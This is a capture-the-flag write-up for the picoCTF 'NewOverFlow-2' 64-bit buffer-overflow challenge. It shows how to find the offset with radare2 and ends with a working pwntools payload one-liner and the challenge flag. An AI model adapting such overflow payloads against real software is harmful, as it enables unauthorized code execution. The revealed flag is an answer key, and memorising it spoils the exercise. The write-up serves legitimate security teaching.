NewOverFlow-2
Last updated
Was this helpful?
Last updated
Was this helpful?
Okay now lets try mainpulating arguments. program. You can find it in /problems/newoverflow-2_5_13f3d3dc09fc09d6d5db8adfa899a05d on the shell server. Source.
The challenge author forgot to remove the flag
function so this is solvable using the same method as
Find the offset/padding
You can use the method described in with the cyclic
and cyclic_find
or you can use the following
Open vuln in with r2 ./vuln
Run aaaa
Run pdf @ sym.vuln
to get var int local_40h @ rbp-0x40
The 0x40
is the buffer location so 8 more bytes are needed to get past the "saved ebp register"
So the offset is 0x40+8
Run afl~flag
in to get the address of flag
and afl~main
to get the address of main
.
We can not offset and call the flag
function directly because that would cause a stack misalignment in 64-bit. So instead we form out payload by doing padding + main_address + flag_address
instead of just padding + flag_address
as we would in 32-bit.
We can use p64
from pwntools to convert the hex addresses to little endian.
Payload complete: python2 -c "from pwn import *; print 'A'*(0x40+8) + p64(0x004008ce) + p64(0x0040084d)" | ./vuln
picoCTF{r0p_1t_d0nT_st0p_1t_b3358018}